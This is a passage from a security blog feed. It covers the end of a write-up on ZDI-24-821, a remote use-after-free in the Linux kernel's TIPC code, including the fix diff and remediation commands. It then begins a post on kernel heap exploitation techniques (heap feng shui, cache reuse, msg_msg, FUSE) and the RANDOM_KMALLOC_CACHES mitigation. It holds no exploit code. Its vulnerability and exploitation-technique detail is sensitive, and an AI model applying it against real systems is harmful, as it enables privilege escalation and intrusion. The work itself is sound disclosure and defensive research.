        *headbuf = NULL;
        return 1;
    }
    *buf = NULL;
    return 0;
err:
    kfree_skb(*buf);                                                [1]
    kfree_skb(*headbuf);                                            [2]
    *buf = *headbuf = NULL;
    return 0;
}</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v6.7.4/source/net/tipc/msg.c#L124">net/tipc/msg.c</a> (6.7.4)</figcaption></figure><p>The initial free can occur at either site [0] or [1]. We&apos;ve covered the latter case, but if the last fragment was coalesced, then the initial free occurs at [0] instead.</p><hr><ol><li><a href="http://tipc.io/protocol.html">TIPC Protocol: 7.2.7. Message Fragmentation</a></li></ol><h2 id="exploitation">Exploitation</h2><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2024/07/i_failed_you.gif" class="kg-image" alt="ZDI-24-821: A Remote UAF in The Kernel&apos;s net/tipc" loading="lazy" width="220" height="165"></figure><p>Unfortunately I haven&apos;t had the time to work on putting together an exploit for this vulnerability, though I&apos;d love to set some time aside in the future. Sorry! :( </p><p>From an LPE perspective, the use-after-free of a <code>struct sk_buff</code> provides a pretty nice primitive due to its complexity and usage. There&apos;s been some nice write-ups in the past making good use of the structure for LPE, so check those out if interested!<sup><a href="https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-0920.html">[1]</a><a href="https://a13xp0p0v.github.io/2021/02/09/CVE-2021-26708.html">[2]</a></sup> </p><p>The RCE side of things is more opaque and something I&apos;m really keen to explore more. Two major roadblocks for Linux kernel RCE are: KASLR and the drastically reduced surface for heap fengshui and generally affecting device state.</p><p>At least on the latter, we have some nice flexibility with this vulnerability. We have some control over the affected caches via our TIPC messages. The defer queue could potentially be used to introduce delays and control when objects are freed. Who knows!</p><hr><ol><li><a href="https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-0920.html">CVE-2021-0920: Android sk_buff use-after-free in Linux</a></li><li><a href="https://a13xp0p0v.github.io/2021/02/09/CVE-2021-26708.html">Four Bytes of Power: Exploiting CVE-2021-26708 in the Linux kernel</a></li></ol><p>Here are some posts on other TIPC related bugs and stuff for interested readers:</p><ol><li><a href="https://www.sentinelone.com/labs/tipc-remote-linux-kernel-heap-overflow-allows-arbitrary-code-execution/">CVE-2021-43267: Remote Linux Kernel Heap Overflow</a> by <a href="https://twitter.com/maxpl0it">@maxpl0it</a></li><li><a href="https://haxx.in/posts/pwning-tipc/">Exploiting CVE-2021-43267</a> by <a href="https://twitter.com/bl4sty">@bl4sty</a></li><li><a href="https://sam4k.com/cve-2022-0435-a-remote-stack-overflow-in-the-linux-kernel/">CVE-2022-0435: A Remote Stack Overflow in The Linux Kernel</a> by me</li></ol><h2 id="fix-remediation">Fix + Remediation </h2><figure class="kg-card kg-code-card"><pre><code>---
 net/tipc/msg.c | 6 +++++-
 1 file changed, 5 insertions(+), 1 deletion(-)

diff --git a/net/tipc/msg.c b/net/tipc/msg.c
index 5c9fd4791c4ba1..9a6e9bcbf69402 100644
--- a/net/tipc/msg.c
+++ b/net/tipc/msg.c
@@ -156,6 +156,11 @@ int tipc_buf_append(struct sk_buff **headbuf, struct sk_buff **buf)
 	if (!head)
 		goto err;
 
+	/* Either the input skb ownership is transferred to headskb
+	 * or the input skb is freed, clear the reference to avoid
+	 * bad access on error path.
+	 */
+	*buf = NULL;
 	if (skb_try_coalesce(head, frag, &amp;headstolen, &amp;delta)) {
 		kfree_skb_partial(frag, headstolen);
 	} else {
@@ -179,7 +184,6 @@ int tipc_buf_append(struct sk_buff **headbuf, struct sk_buff **buf)
 		*headbuf = NULL;
 		return 1;
 	}
-	*buf = NULL;
 	return 0;
 err:
 	kfree_skb(*buf);</code></pre><figcaption>Commit <a href="https://github.com/torvalds/linux/commit/080cbb890286cd794f1ee788bbc5463e2deb7c2b">080cbb890286</a>, authored by <a href="https://github.com/torvalds/linux/commits?author=kuba-moo">kuba-moo</a></figcaption></figure><p>We can see the patch is fairly simple (even if the context is not): the reference to the input skb ( <code>buf</code> ) is cleared before the error case that can cause the UAF. This is because the block handling the fragment coalescing/chaining already does the appropriate cleanup for it via <code>frag</code> (which at this point is also a reference to the input skb).</p><p>It&apos;s a bit clearer if we provide some more context:</p><figure class="kg-card kg-code-card"><pre><code class="language-C">    /* Either the input skb ownership is transferred to headskb
     * or the input skb is freed, clear the reference to avoid
     * bad access on error path.
     */
    *buf = NULL;
    if (skb_try_coalesce(head, frag, &amp;headstolen, &amp;delta)) {  [2]
        kfree_skb_partial(frag, headstolen);                  [3]
    } else {                                                  [4]
        tail = TIPC_SKB_CB(head)-&gt;tail;
        if (!skb_has_frag_list(head))
            skb_shinfo(head)-&gt;frag_list = frag;
        else
            tail-&gt;next = frag;
        head-&gt;truesize += frag-&gt;truesize;
        head-&gt;data_len += frag-&gt;len;
        head-&gt;len += frag-&gt;len;
        TIPC_SKB_CB(head)-&gt;tail = frag;
    }

    if (fragid == LAST_FRAGMENT) {
        TIPC_SKB_CB(head)-&gt;validated = 0;
        if (unlikely(!tipc_msg_validate(&amp;head)))
            goto err;
        *buf = head;                                          [0]
        TIPC_SKB_CB(head)-&gt;tail = NULL;
        *headbuf = NULL;
        return 1;
    }
    // before the patch: *buf = NULL;                         [1]
    return 0;
err:
    kfree_skb(*buf);
    kfree_skb(*headbuf);
    *buf = *headbuf = NULL;
    return 0;
}</code></pre><figcaption>net/tipc/msg.c (it&apos;s not on elixir yet, but will link)</figcaption></figure><p>So if we recall our vulnerable case, after we&apos;ve chained our last fragment, if the TIPC header of the fragmented message (which is now assembled) is invalid, we hit the error case at [0]. We then go to <code>err:</code> and cause the UAF, as <code>buf</code> was never cleared at [1]. </p><p>By the time we reach [2] we know that the input skb is a trailing fragment and is reference by both <code>buf</code> and <code>frag</code>. At this point we don&apos;t need the <code>buf</code> reference as the following block handles the input skb appropriately via <code>frag</code>: either it is coalesced into <code>head</code> and freed [3] or it is added to <code>head</code>&apos;s frag list at which point <code>head</code> is responsible for it [4]. </p><p>As a result, we can just clear the unnecessary <code>buf</code> reference before it can cause any trouble. Hopefully that&apos;s not too convoluted an explanation for a simple patch!</p><h3 id="remediation">Remediation</h3><p>Chances are, as I mentioned up top, unless you&apos;re running TIPC you&apos;re all good! However, if you are, or want to be extra safe, prior to a patch being made available, the TIPC module can be disabled from loading if not in use:</p><ul><li><code>$ lsmod | grep tipc</code> will let you know if the module is currently loaded,</li><li><code>modprobe -r tipc</code> may allow you to unload the module if loaded, however you may need to reboot your system</li><li><code>$ echo &quot;install tipc /bin/true&quot; &gt;&gt; /etc/modprobe.d/disable-tipc.conf</code> will prevent the module from being loaded, which is a good idea if you have no reason to use it</li></ul><h2 id="wrapup">Wrapup </h2><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2024/04/i_think_our_work_here_is_done.gif" class="kg-image" alt="ZDI-24-821: A Remote UAF in The Kernel&apos;s net/tipc" loading="lazy" width="500" height="282"></figure><p>As always, thank you for surviving up until this point! This research has been super fun, hopefully this has been an interesting read and not missing <em>too</em> much context; I appreciate it&apos;s a particularly complex topic with lots of moving parts. Also, this was somewhat rushed due to having a lot going on at the moment, so I apologise for any drop in quality!</p><p>I&apos;d like to thank ZDI and the Linux kernel maintainers for the work involved in getting this vulnerability disclosed and patched!</p><p>There&apos;s quite a few things I&apos;d love to do in follow-up to this post, if I can only find the time! I&apos;d be happy to go into more detail on the discovery process and working with syzkaller, I <em>really </em>want to play around with exploitation and I also think it&apos;d be neat to expand the Linternals blog series with some networking content!</p><p>In the meanwhile, if you&apos;re interested in modifying syzkaller, checkout <a href="https://x.com/notselwyn/">@notselwyn</a>&apos;s post on &quot;<a href="https://pwning.tech/ksmbd-syzkaller/#4-adding-kcov-support-to-ksmbd">Tickling ksmbd: fuzzing SMB in the Linux kernel</a>&quot;, I found it super helpful! </p><p>Feel free to <a href="https://twitter.com/sam4k1">@me</a> if you have any questions, suggestions or corrections :)</p><p>exit(0);</p>]]></content:encoded></item><item><title><![CDATA[Exploring Linux's New Random Kmalloc Caches]]></title><description><![CDATA[Let's explore the modern kernel heap exploitation meta and how the new RANDOM_KMALLOC_CACHES tries to address it.]]></description><link>https://sam4k.com/exploring-linux-random-kmalloc-caches/</link><guid isPermaLink="false">651b253092020209c38fcfed</guid><category><![CDATA[VRED]]></category><category><![CDATA[linux]]></category><category><![CDATA[linternals]]></category><category><![CDATA[memory]]></category><dc:creator><![CDATA[sam4k]]></dc:creator><pubDate>Fri, 03 Nov 2023 14:10:43 GMT</pubDate><media:content url="https://sam4k.com/content/images/2023/10/tired_computer.gif" medium="image"/><content:encoded><![CDATA[<img src="https://sam4k.com/content/images/2023/10/tired_computer.gif" alt="Exploring Linux&apos;s New Random Kmalloc Caches"><p>In this post we&apos;re going to be taking a look at the state of contemporary kernel heap exploitation and how the new opt-in hardening feature added in the 6.6 Linux kernel, <code>RANDOM_KMALLOC_CACHES</code>, looks to address that.</p><p>To provide some context to the problems <code>RANDOM_KMALLOC_CACHES</code> tries to address, we&apos;ll spend a bit of time covering the current heap exploitation meta. This actually ended up being reasonably in-depth (oops) and touches on general approaches to exploitation as well as current mitigations and techniques such as heap feng shui, cache reuse attacks, FUSE and making use of elastic objects.</p><p>Armed with that information we&apos;ll then explore the new patch in detail, discuss how it addresses heap exploitation and have a bit of fun speculating how the meta might shift as a result of this.</p><p>As this post is focusing on kernel heap exploitation, I&apos;ll be assuming some prerequisite knowledge around topics like kernel memory allocators (luckily for you I&apos;ve written about this already in some detail as part of Linternals, <a href="https://sam4k.com/linternals-introduction/#contents">here</a>).</p><h2 id="contents">Contents</h2><!--kg-card-begin: markdown--><ul>
<li><a href="#current-heap-exploitation-meta">Current Heap Exploitation Meta</a>
<ul>
<li><a href="#approaching-heap-exploitation">Approaching Heap Exploitation</a></li>
<li><a href="#current-mitigations">Current Mitigations</a></li>
<li><a href="#generic-techniques">Generic Techniques</a>
<ul>
<li><a href="#basic-heap-feng-shui">Basic Heap Feng Shui</a></li>
<li><a href="#cache-reuse-attacks">Cache Reuse Attacks</a></li>
<li><a href="#elastic-objects">Elastic Objects</a></li>
<li><a href="#fuse">FUSE</a></li>
</ul>
</li>
</ul>
</li>
<li><a href="#introducing-random-kmalloc-caches">Introducing Random Kmalloc Caches</a></li>
<li><a href="#diving-into-the-implementation">Diving Into The Implementation</a>
<ul>
<li><a href="#cache-setup">Cache Setup</a></li>
<li><a href="#seed-setup">Seed Setup</a></li>
<li><a href="#kmalloc-allocations">Kmalloc Allocations</a></li>
<li><a href="#thoughts">Thoughts</a></li>
</ul>
</li>
<li><a href="#whats-the-new-meta">What&apos;s The New Meta?</a></li>
<li><a href="#wrapping-up">Wrapping Up</a></li>
</ul>
<!--kg-card-end: markdown--><h2 id="current-heap-exploitation-meta">Current Heap Exploitation Meta</h2><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2023/10/need_context.gif" class="kg-image" alt="Exploring Linux&apos;s New Random Kmalloc Caches" loading="lazy" width="480" height="269"></figure><p>Alright, before we dive into the juicy details lets quickly touch on the current state of heap exploitation to help us understand why this patch was added and how it effects things!</p><p>Heap corruption is one of the more common types of bugs found in the kernel today (think use-after-free, heap overflow etc.). When we talk about heap corruption in the Linux kernel, we&apos;re referring to memory dynamically allocated via the slab allocator (e.g. <code><a href="https://elixir.bootlin.com/linux/v6.6/source/include/linux/slab.h#L590">kmalloc()</a></code>) or directly via the page allocator (e.g. <code><a href="https://elixir.bootlin.com/linux/v6.6/source/include/linux/gfp.h#L269">alloc_pages()</a></code>).</p><p>The fundamental goal of exploitation is to leverage our heap corruption to gain more control over the system, typically to elevate our privileges or at least get closer to being able to do so.</p><p>In reality, these heap corruptions can come in all shapes and sizes. The objects we&apos;re able to use-after-free can come from different caches, there may be a race involved, there may be fields which need to be specific values etc. Similarly our overflows can also have any number of constraints which impact our approach to leverage the corruption.</p><p>However, there exist a number of generic techniques for heap exploitation, which help cut down on the time needed to go from heap corruption to working exploit. As we know, security is a cat and mouse game, so these techniques are continually adapting to keep up with new mitigations. </p><p>From a defenders perspective, in an ideal world we would mitigate heap corruption bugs entirely. Failing that, we can make it as hard as possible for attackers to leverage any heap corruption bugs they do find. Responding to the generic techniques used by attackers is a good way to go about this, forcing each bug to require a bespoke approach to exploit.</p><h3 id="approaching-heap-exploitation">Approaching Heap Exploitation </h3><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2023/10/i_want_details.gif" class="kg-image" alt="Exploring Linux&apos;s New Random Kmalloc Caches" loading="lazy" width="480" height="270"></figure><p>Okay with the exposition out of the way, lets talk a bit about how we might go about exploiting a heap corruption in the kernel nowadays. I&apos;m going to (try) keep things fairly high level, with a focus on the slab allocator side of things due to the topics context.</p><p>So first things first we want to make sure we understand the bug itself: how do we reach it, what kernel configurations or capabilities do we require? What is the nature of the corruption, is it a use-after-free? What are the limitations around triggering the bug? What data structures are effected, what are the risks of a kernel panic?</p><p>Then we want to get into the specifics of the heap corruption itself. How are the affected objects allocated? Is it via the slab allocator or the page allocator? For slab allocations, we&apos;re interested in what cache the object is allocated to, so we can infer what other objects share the same cache and can potentially be corrupted. </p><p>There are several factors to consider at the moment when determining what cache our object will end up in:</p><ul><li><strong>The API used</strong> will tell us if its allocated into a general purpose cache with other similar sized objects (<code>kmalloc()</code>, <code>kzalloc()</code>, <code>kcalloc()</code> etc.) or private cache ( <code><a href="https://elixir.bootlin.com/linux/v6.6/source/include/linux/slab.h#L499">kmem_cache_alloc()</a></code>) with slabs containing only objects of that type.</li><li><strong>The GFP (Get Free Page) flags </strong>used can tell us which of the general purpose cache types the object is allocated. By default, allocations will go to the standard general purpose caches, <code>kmalloc-x</code>, where x is the &quot;bucket size&quot;. The other common case is <code>GFP_KERNEL_ACCOUNT</code>, typically used for untrusted allocations<sup><a href="https://www.kernel.org/doc/Documentation/core-api/memory-allocation.rst">[1]</a></sup>, will put objects in an accounted cache, named <code>kmalloc-cg-x</code>. </li><li><strong>The size of the object</strong> will determine, for general purpose caches, which &quot;bucket size&quot; the object will end up in. The <code>x</code> in <code>kmalloc-x</code> denotes the fixed size in bytes allocated to each object in the cache&apos;s slabs. Objects will be allocated into the smallest general purpose cache is can fit into. </li></ul><p>Now we&apos;ve built up an understanding of the bug and how it&apos;s allocated, it&apos;s time to think about how we want to use our corruption. By knowing what cache our object is in, we know what other objects can or can&apos;t be allocated into the same slab.</p><p>The general goal here is to find a viable object to corrupt. We can use our understanding of how the slab allocator works in order to shape the layout of memory to make this more reliable, or to make otherwise incorruptible objects corruptible. </p><h3 id="current-mitigations">Current Mitigations</h3><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2023/10/wait_wait_wait.gif" class="kg-image" alt="Exploring Linux&apos;s New Random Kmalloc Caches" loading="lazy" width="400" height="400"></figure><p>However, before we get ahead of ourselves, we first have to consider any mitigations that might impact our ability to exploit our bug on modern systems. This won&apos;t be an exhaustive list, but will help provide some context on the current meta:</p><ul><li><code><a href="https://cateee.net/lkddb/web-lkddb/SLAB_FREELIST_HARDENED.html">CONFIG_SLAB_FREELIST_HARDENED</a></code> adds checks to protect slab metadata, such as the freelist pointers stored in free objects within a SLUB slab and checks for double-frees.</li><li><code><a href="https://cateee.net/lkddb/web-lkddb/SLAB_FREELIST_RANDOM.html">CONFIG_SLAB_FREELIST_RANDOM</a></code> randomises the freelist order when a new cache slab is allocated, such that an attacker can&apos;t infer the order objects within that slab will be filled. The aim to reduce the knowledge &amp; control attackers have over heap state.</li><li><code><a href="https://cateee.net/lkddb/web-lkddb/STATIC_USERMODEHELPER.html">CONFIG_STATIC_USERMODEHELPER</a></code> mitigates a popular technique for leveraging heap corruption, which we&apos;ll touch on in the next section.</li><li>Slab merging, enabled via <code>slub_merge</code> bootarg or <code>CONFIG_SLAB_MERGE_DEFAULT=y</code>, allows slab caches to be merged for performance. As you can imagine, this is nice for attackers as it opens up our options for corruption. </li><li>Some others, which are less commonly enabled afaik, or out of scope include <code><a href="https://cateee.net/lkddb/web-lkddb/SHUFFLE_PAGE_ALLOCATOR.html">CONFIG_SHUFFLE_PAGE_ALLOCATOR</a></code>, <code><a href="https://cateee.net/lkddb/web-lkddb/CFI_CLANG.html">CONFIG_CFI_CLANG</a></code>, <code>init_on_alloc</code> / <code><a href="https://cateee.net/lkddb/web-lkddb/INIT_ON_ALLOC_DEFAULT_ON.html">CONFIG_INIT_ON_ALLOC_DEFAULT_ON=y</a></code> &amp; <code>init_on_free</code> / <code><a href="https://cateee.net/lkddb/web-lkddb/INIT_ON_FREE_DEFAULT_ON.html">CONFIG_INIT_ON_FREE_DEFAULT_ON=y</a></code>.</li></ul><h3 id="generic-techniques">Generic Techniques</h3><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2023/10/the_good_part.gif" class="kg-image" alt="Exploring Linux&apos;s New Random Kmalloc Caches" loading="lazy" width="480" height="270"></figure><p>Okay, now we&apos;re ready to starting pwning the heap. We understand our bug, the allocation context and the kind of mitigations we&apos;re dealing with. Let&apos;s explore some contemporary techniques used to get around this mitigation and exploit heap corruptions bugs!</p><h4 id="basic-heap-feng-shui">Basic Heap Feng Shui</h4><p>A fundamental aspect of heap corruption is the ability to shape the heap, commonly referred to as &quot;heap feng shui&quot;. We can use our understanding of how the allocator works and the mitigations in place to try get things where we want them in the heap.</p><p>Lets use a generic heap overflow to demonstrate this. We can overflow object <code>x</code> and we want to corrupt object <code>y</code>. They&apos;re in the same generic cache, so our goal is to land <code>y</code> adjacent to <code>x</code> in the same slab. </p><p>We want to consider how active the cache is (aka is it cache noise) and up-time, as this will give us an idea of the cache slab state. On a typical workload with a fairly used cache size, we can assume there are likely to be several partially filled slabs; this is our starting state.</p><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2023/10/1_partial_slabs.png" class="kg-image" alt="Exploring Linux&apos;s New Random Kmalloc Caches" loading="lazy" width="971" height="332" srcset="https://sam4k.com/content/images/size/w600/2023/10/1_partial_slabs.png 600w, https://sam4k.com/content/images/2023/10/1_partial_slabs.png 971w" sizes="(min-width: 720px) 720px"></figure><p>A basic heap feng shui approach would be to first allocate a number of object <code>y</code> to fill up the holes in the partial slabs:</p><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2023/10/2_filled_partials.png" class="kg-image" alt="Exploring Linux&apos;s New Random Kmalloc Caches" loading="lazy" width="1019" height="332" srcset="https://sam4k.com/content/images/size/w600/2023/10/2_filled_partials.png 600w, https://sam4k.com/content/images/size/w1000/2023/10/2_filled_partials.png 1000w, https://sam4k.com/content/images/2023/10/2_filled_partials.png 1019w" sizes="(min-width: 720px) 720px"></figure><p>Then, we allocate several slabs worth of object <code>y</code> which we can assume is to trigger new slabs to be allocated, hopefully filled with object <code>y</code>:</p><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2023/10/3_filled_new_slabs.png" class="kg-image" alt="Exploring Linux&apos;s New Random Kmalloc Caches" loading="lazy" width="1019" height="299" srcset="https://sam4k.com/content/images/size/w600/2023/10/3_filled_new_slabs.png 600w, https://sam4k.com/content/images/size/w1000/2023/10/3_filled_new_slabs.png 1000w, https://sam4k.com/content/images/2023/10/3_filled_new_slabs.png 1019w" sizes="(min-width: 720px) 720px"></figure><p>Then, from the second batch of allocations into new slabs, we would free every other allocation to try and create holes in the new slabs: </p><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2023/10/4_holes.png" class="kg-image" alt="Exploring Linux&apos;s New Random Kmalloc Caches" loading="lazy" width="1019" height="299" srcset="https://sam4k.com/content/images/size/w600/2023/10/4_holes.png 600w, https://sam4k.com/content/images/size/w1000/2023/10/4_holes.png 1000w, https://sam4k.com/content/images/2023/10/4_holes.png 1019w" sizes="(min-width: 720px) 720px"></figure><p>We would then allocate our vulnerable object <code>x</code> in the hopes we have increased our chances that it will be allocated into one of the wholes we just created:</p><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2023/10/5_landed.png" class="kg-image" alt="Exploring Linux&apos;s New Random Kmalloc Caches" loading="lazy" width="1019" height="299" srcset="https://sam4k.com/content/images/size/w600/2023/10/5_landed.png 600w, https://sam4k.com/content/images/size/w1000/2023/10/5_landed.png 1000w, https://sam4k.com/content/images/2023/10/5_landed.png 1019w" sizes="(min-width: 720px) 720px"></figure><h4 id="cache-reuseoverflow-attacks">Cache Reuse/Overflow Attacks</h4><p>Remember earlier we mentioned how there are different types of general purpose caches and even private caches, all with their own slabs? What if our vulnerable object is in one cache and we found an object we really, <em>really</em> wanted to corrupt in another cache?</p><p>If we recall our memory allocator fundamentals<sup><a href="https://sam4k.com/linternals-memory-allocators-part-1/">[2]</a></sup>, we know that the page allocator is the fundamental memory allocator for the Linux kernel, sitting above it is the slab allocator. So the slab allocator makes use of the page allocator, this includes for the allocation of the chunks of memory used as slabs (to hold cache objects). Are you still with me?</p><p>So when all the objects in a slab are freed, the slab itself may in turn be freed back to the page allocator, ready to be reallocated. Can you see where this is going? </p><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2023/10/bill_hader_omg.gif" class="kg-image" alt="Exploring Linux&apos;s New Random Kmalloc Caches" loading="lazy" width="470" height="480"></figure><p>If we have a UAF on an object in a private cache slab, if that slab is then freed and reallocated as a general purpose cache, suddenly our UAF&apos;d memory is pointing to general purpose objects! Our options for corruption have suddenly expanded!</p><p>This kind of technique is known as a &quot;cache reuse&quot; attack and has been documented previously in more detail<a href="https://duasynt.com/blog/linux-kernel-heap-feng-shui-2022"><sup>[3]</sup></a>. By using a similar approach of manipulating the underlying page layout, &quot;cache overflow&quot; attacks are possible too, where you align to slabs from separate caches adjacent to one another in physical memory, which has been used in some great CTF writeups<a href="https://www.willsroot.io/2022/08/reviving-exploits-against-cred-struct.html"><sup>[4]</sup></a>.</p><h4 id="elastic-objects">Elastic Objects</h4><p>Another cornerstone of contemporary heap exploitation is the use of &quot;elastic objects&quot;<sup>[6]</sup>. These are essential structures that have a dynamic size, typically a length field will describe the size of a buffer within the same struct.</p><p>Sounds pretty straight forward, right? Why is this relevant? Well, we&apos;ve spoken about the bespoke nature of heap corruption vulnerabilities, and the variety of cache types and sizes. </p><p>Elastic objects can provide generic techniques to exploiting these vulnerabilities, as objects that can be corrupted across a variety of cache sizes due to their elastic nature. By generalising the object being corrupted, a lot of time can be spent mining for objects that are corruptible for a certain cache size and then developing a bespoke technique for using that specific corruption to elevate privileges (which can be quite time consuming!). </p><p>A popular elastic object used on contemporary heap corruption is <code><a href="https://elixir.bootlin.com/linux/v6.6/source/include/linux/msg.h#L9">struct msg_msg</a></code>, which can be used to leverage an out-of-bounds heap write into arbitrary read/write<sup><a href="https://www.willsroot.io/2021/08/corctf-2021-fire-of-salvation-writeup.html">[5]</a></sup>:</p><figure class="kg-card kg-code-card"><pre><code>/* one msg_msg structure for each message */
struct msg_msg {
	struct list_head m_list;
	long m_type;
	size_t m_ts;		/* message text size */
	struct msg_msgseg *next;
	void *security;
	/* the actual message follows immediately */
};</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v6.6/source/include/linux/msg.h#L9">include/linux/msg.h</a> (v6.6)</figcaption></figure><h4 id="fuse">FUSE</h4><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2023/10/theresmore.gif" class="kg-image" alt="Exploring Linux&apos;s New Random Kmalloc Caches" loading="lazy" width="480" height="270"></figure><p>Seeing as we&apos;re going all out on the exploitation techniques here, I might as well throw in a <em><strong>quick</strong></em> shoutout to FUSE as well, which is commonly used in kernel exploitation.</p><p>Filesystem in Userspace is &quot;is an interface for userspace programs to export a filesystem to the Linux kernel.&quot;<sup><a href="https://github.com/libfuse/libfuse">[7]</a></sup>, enabled via <code><a href="https://cateee.net/lkddb/web-lkddb/FUSE_FS.html">CONFIG_FUSE_FS</a>=y</code>. Essentially it allows, often unprivileged, users to define their own filesystems. </p><p>Normally, mounting filesystems is a privileged action and actually defining a filesystem would require you to write kernel code. With FUSE, we can do away with this. By defining the read operations in our FUSE FS, we&apos;re able to define what happens when kernel tries to read one our FUSE files, which includes sleeping...</p><p>This gives us the ability to arbitrarily block kernel threads that try to read files in our FUSE FS (essentially accessing to user virtual addresses we can control, as we can map in one of our FUSE files and pass that over to the kernel). </p><p>So what does this have to do with kernel exploitation? Well, as we mentioned previously, a key part of heap exploitation is finding interesting objects to corrupt or control the layout of memory. Ideally we want to be able to allocate and free these on demand, if they&apos;re immediately freed there&apos;s not too much we can do with them ... right?</p><p>Perhaps! This is where FUSE comes in: if we have a scenario where an object we <em>really, really </em>want to corrupt is allocated and freed within the same system call, we may be able to keep it in memory if there&apos;s a userspace access we can block on between the allocation and free! You can find more on this, plus some examples, from this <a href="https://duasynt.com/blog/linux-kernel-heap-spray">2018 Duasynt blog post</a>.</p><hr><ol><li><a href="https://www.kernel.org/doc/Documentation/core-api/memory-allocation.rst">https://www.kernel.org/doc/Documentation/core-api/memory-allocation.rst</a></li><li><a href="https://sam4k.com/linternals-memory-allocators-part-1/">https://sam4k.com/linternals-memory-allocators-part-1/</a></li><li><a href="https://duasynt.com/blog/linux-kernel-heap-feng-shui-2022">https://duasynt.com/blog/linux-kernel-heap-feng-shui-2022</a></li><li><a href="https://www.willsroot.io/2022/08/reviving-exploits-against-cred-struct.html">https://www.willsroot.io/2022/08/reviving-exploits-against-cred-struct.html</a></li><li><a href="https://www.willsroot.io/2021/08/corctf-2021-fire-of-salvation-writeup.html">https://www.willsroot.io/2021/08/corctf-2021-fire-of-salvation-writeup.html</a></li><li>the earliest mention i&apos;m aware of in an kernel xdev context is from the 2020 paper, <a href="https://zplin.me/papers/ELOISE.pdf">&quot;A Systematic Study of Elastic Objects in Kernel Exploitation&quot;</a>, could we be wrong tho </li><li><a href="https://github.com/libfuse/libfuse">https://github.com/libfuse/libfuse</a></li><li><a href="https://duasynt.com/blog/linux-kernel-heap-spray">https://duasynt.com/blog/linux-kernel-heap-spray</a></li></ol><h2 id="introducing-random-kmalloc-caches">Introducing Random Kmalloc Caches</h2><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2023/10/startin_simple-1.gif" class="kg-image" alt="Exploring Linux&apos;s New Random Kmalloc Caches" loading="lazy" width="480" height="270"></figure><p>Well, that was quite the background read (sorry not sorry), but we&apos;re hopefully in a good position to dive into this new mitigation: <strong>Random kmalloc caches</strong><sup><a href="https://github.com/torvalds/linux/commit/3c6152940584290668b35fa0800026f6a1ae05fe">[1]</a></sup>.</p><p>This mitigation effects the generic slab cache implementation. Previously, there was a single generic slab cache for each size &quot;step&quot;: <code>kmalloc-32</code>, <code>kmalloc-64</code>, <code>kmalloc-128</code> etc. Such that an 40 byte object, allocated via <code>kmalloc()</code>, with the correct GFP flags, is always going to end up in the <code>kmalloc-64</code> cache. Straightforward right?</p><p><code>CONFIG_RANDOM_KMALLOC_CACHES=y</code> introduces multiple generic slab caches for each size, 16 by default (named <code>kmalloc-rnd-01-32</code>, <code>kmalloc-rnd-02-32</code> etc.). When an object allocated via <code>kmalloc()</code> it is allocated to one of these 16 caches &quot;randomly&quot;, depending on the callsite for the <code>kmalloc()</code> and a per-boot seed.</p><p>Developed by Huawei engineers, this mitigation aims to make exploiting slab heap corruption vulnerabilities more difficult. By distributing the available general purpose objects for heap feng shui for any given cache size non-deterministically across up to 16 different caches, it&apos;s harder for an attacker to target specific objects or caches for exploitation.</p><p>If you&apos;re interested in more information, you can also follow the initial discussions over on the Linux kernel mailing list.<sup><a href="https://lore.kernel.org/lkml/20230315095459.186113-1-gongruiqi1@huawei.com/">[2]</a><a href="https://lore.kernel.org/lkml/20230508075507.1720950-1-gongruiqi1@huawei.com/">[3]</a><a href="https://lore.kernel.org/lkml/20230714064422.3305234-1-gongruiqi@huaweicloud.com/#r">[4]</a></sup> </p><hr><ol><li><a href="https://github.com/torvalds/linux/commit/3c6152940584290668b35fa0800026f6a1ae05fe">https://github.com/torvalds/linux/commit/3c6152940584290668b35fa0800026f6a1ae05fe</a></li><li><a href="https://lore.kernel.org/lkml/20230315095459.186113-1-gongruiqi1@huawei.com/">[PATCH RFC] Randomized slab caches for kmalloc()</a></li><li><a href="https://lore.kernel.org/lkml/20230508075507.1720950-1-gongruiqi1@huawei.com/">[PATCH RFC v2] Randomized slab caches for kmalloc()</a></li><li><a href="https://lore.kernel.org/lkml/20230714064422.3305234-1-gongruiqi@huaweicloud.com/#r">[PATCH v5] Randomized slab caches for kmalloc()</a></li></ol><h2 id="diving-into-the-implementation">Diving Into The Implementation</h2><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2023/10/about_to_get_real_2-1.gif" class="kg-image" alt="Exploring Linux&apos;s New Random Kmalloc Caches" loading="lazy" width="480" height="240"></figure><p>The time has come, I&apos;m sure you&apos;ve all been chomping at the bit for the last 2000 words, let&apos;s dig into the implementation for this patch and see what the deal is. </p><p>Honestly the implementation for this mitigation is actually pretty straight forward, with only 97 additions and 15 deletions across 7 files, so more than anything it&apos;s going to be a bit of a primer on the parts of the kmalloc API that are effected by this patchset. </p><p>We&apos;ll follow up with a bit of an analysis on the pros and cons of the implementation tho.</p><h3 id="cache-setup">Cache Setup</h3><p>So first things first lets touch on how the kmalloc caches are actually created by the kernel and some of the changes needed to include the random cache copies. </p><p>The header additions include configurations for things like the number of cache copies:</p><pre><code class="language-C">+#ifdef CONFIG_RANDOM_KMALLOC_CACHES
+#define RANDOM_KMALLOC_CACHES_NR	15 // # of cache copies
+#else
+#define RANDOM_KMALLOC_CACHES_NR	0
